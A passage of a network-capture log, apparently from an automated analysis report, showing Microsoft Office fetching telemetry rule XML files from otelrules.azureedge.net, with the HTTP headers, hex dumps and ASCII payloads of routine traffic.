                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                          ETag: "0x8DC582BDBD9126E"
                                                                                                                          x-ms-request-id: 0d065d93-f01e-0096-29a3-1b10ef000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cf96l6t7bwyfgbkhw000000041000000000fagk
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:53 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          138192.168.2.44990313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:53 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1415
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                          ETag: "0x8DC582BE7C66E85"
                                                                                                                          x-ms-request-id: 056f3a33-b01e-0097-671a-1c4f33000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cfvtw4hh2496wp8p800000003e000000000ge1p
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:53 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          139192.168.2.44990413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:53 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1378
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                          ETag: "0x8DC582BDB813B3F"
                                                                                                                          x-ms-request-id: d15b385d-801e-0047-591b-1c7265000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cfjxfnba42c5rukwg000000022g00000000a8s0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:53 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          140192.168.2.44990513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:53 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1405
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                          ETag: "0x8DC582BE89A8F82"
                                                                                                                          x-ms-request-id: bb1c3872-701e-0050-4447-1c6767000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cfcrfgzd01a8emnyg00000002hg00000000e4p9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:53 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          141192.168.2.44990613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:53 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1368
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                          ETag: "0x8DC582BE51CE7B3"
                                                                                                                          x-ms-request-id: 4a4b6355-301e-0051-1bce-1a38bb000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cfqxt4wrzg7st2fm800000005bg000000000090
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:53 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          142192.168.2.44990713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1415
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                          ETag: "0x8DC582BDCE9703A"
                                                                                                                          x-ms-request-id: 7ec36ae7-901e-0064-7562-1ce8a6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cf6f7vv3recfp4a6w0000000250000000009t3b
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          143192.168.2.44990813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:54 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:54 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1378
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                          ETag: "0x8DC582BE584C214"
                                                                                                                          x-ms-request-id: b0bf752c-501e-0047-5047-1cce6c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162154Z-17db6f7c8cfjxfnba42c5rukwg00000002700000000003a4
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          144192.168.2.44990913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:54 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:54 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1407
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                          ETag: "0x8DC582BE687B46A"
                                                                                                                          x-ms-request-id: 1c2441a4-201e-0051-796b-1c7340000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162154Z-17db6f7c8cffhvbz3mt0ydz7x400000003ag000000008n9y
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          145192.168.2.44991013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:54 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:54 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1370
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                          ETag: "0x8DC582BDE62E0AB"
                                                                                                                          x-ms-request-id: 4ec1f56b-301e-006e-0147-1cf018000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162154Z-17db6f7c8cfhzb2znbk0zyvf6n00000004q000000000g87k
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          146192.168.2.44991113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:54 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:54 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1397
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                          ETag: "0x8DC582BE156D2EE"
                                                                                                                          x-ms-request-id: 63590950-201e-0085-2bd8-1a34e3000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162154Z-17db6f7c8cfbd7pgux3k6qfa60000000044g0000000000qs
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          147192.168.2.44991213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:54 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
